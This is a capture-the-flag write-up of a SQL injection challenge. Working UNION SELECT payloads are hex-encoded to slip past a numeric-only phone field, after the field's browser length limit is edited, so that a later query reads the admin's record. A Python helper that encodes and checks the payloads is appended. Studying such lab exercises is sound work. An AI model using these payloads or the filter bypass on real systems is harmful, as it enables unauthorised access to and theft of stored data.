The challenge opens with an ordinary login page. Register an account and sign in: inside there are two functions, one that queries the current user's phone number and one that logs out.
Clicking the query shows the user's phone number.
That means the page must be running a database query, so this is probably a SQL injection problem.
Examining the page source also turns up a hint pointing at the query interface.
Not much more to say; let's get started.
First, try registering an account whose phone number contains a SQL injection string.
The response is a prompt: "Please enter a number."
So the phone field only accepts numeric input. The way around this is to pass the injection string as a hexadecimal literal (0x...) instead of a plain string: it looks numeric to the input check, while MySQL evaluates a 0x... literal as a string.
Run the payload through a hex-encoding tool.
First try a query against the database:
1 union select table_name from information_schema.tables where table_schema=database()
The response says the phone number is invalid. The registration form probably limits the length of the phone number, and the hex-encoded payload is far longer than a phone number.
(Re-registering does not change this: the phone field on the registration page will not accept more than 11 characters, so the longer payload cannot be typed in directly.)
On the registration page, try editing the page source.
Press F12, find the length limit (maxlength) on the phone field in the source, and change it; I changed it to 99999.
Then try registering again with the hex-encoded payload as the phone number.
Then log in.
Success.
Next, query the database name:
1 and 1=2 union select database()
Then the tables:
1 union select table_name from information_schema.tables where table_schema=database()
Then the columns:
1 union select column_name from information_schema.columns where table_name="user"
It returned a pile of columns, but the three that matter are the obvious ones (username, phone and the like).
Earlier we saw that an admin user exists, so the flag is most likely in admin's record.
Try reading the information for the username admin.
Construct the payload: 1 and 1=2 union select phone from user where username="admin"
Get the flag.
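As an added example (not part of the original write-up), the small Python helper below does the encoding step from the walkthrough: it turns each injection payload into a MySQL 0x... hex literal, decodes it back to confirm the round trip, checks it against a hypothetical "must look like a number" filter of the kind the registration form appears to use, and reports why the encoded payload no longer fits in an 11-character phone field. The filter regex and the 11-character limit are assumptions taken from what the write-up observed, not the challenge's actual source.

```python
import re

# Assumption: the client-side limit on the phone field seen in the write-up.
PHONE_MAXLENGTH = 11

# The payloads used in the walkthrough, in order.
PAYLOADS = {
    "database": "1 and 1=2 union select database()",
    "tables": "1 union select table_name from information_schema.tables "
              "where table_schema=database()",
    "columns": "1 union select column_name from information_schema.columns "
               'where table_name="user"',
    "admin_phone": '1 and 1=2 union select phone from user where username="admin"',
}


def mysql_hex_literal(payload: str) -> str:
    """Encode a string as a MySQL hexadecimal literal (0x...).

    MySQL treats 0x6162 as the string 'ab' in a string context, which is
    what lets an all-hex value smuggle SQL past a numeric-only input check.
    """
    return "0x" + payload.encode("utf-8").hex()


def mysql_hex_decode(literal: str) -> str:
    """Reverse mysql_hex_literal, to confirm the payload survives intact."""
    if not literal.startswith("0x"):
        raise ValueError("not a 0x hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


# Hypothetical server-side check: accepts decimal digits or a 0x hex literal,
# which matches the behaviour seen in the write-up (plain SQL rejected,
# hex-encoded SQL accepted). The real challenge code is not known.
_NUMERIC_RE = re.compile(r"^(?:[0-9]+|0x[0-9a-fA-F]+)$")


def looks_numeric(value: str) -> bool:
    return _NUMERIC_RE.match(value) is not None


def fits_phone_field(value: str, maxlength: int = PHONE_MAXLENGTH) -> bool:
    """Would the browser's maxlength attribute let this value be typed in?"""
    return len(value) <= maxlength


def encode_all(payloads: dict = PAYLOADS) -> dict:
    """Encode every payload and record whether it passes each obstacle."""
    result = {}
    for name, sql in payloads.items():
        literal = mysql_hex_literal(sql)
        result[name] = {
            "literal": literal,
            "raw_passes_numeric_check": looks_numeric(sql),
            "hex_passes_numeric_check": looks_numeric(literal),
            "fits_in_form": fits_phone_field(literal),
            "round_trip_ok": mysql_hex_decode(literal) == sql,
        }
    return result


if __name__ == "__main__":
    for name, info in encode_all().items():
        print(f"{name}: {info['literal'][:40]}... "
              f"numeric={info['hex_passes_numeric_check']} "
              f"fits_maxlength={info['fits_in_form']}")
```

Every payload passes the numeric check only once hex-encoded, and none of them fits in the 11-character field, which is why the maxlength attribute has to be edited (or the POST request sent directly, bypassing the browser form) before the registration goes through.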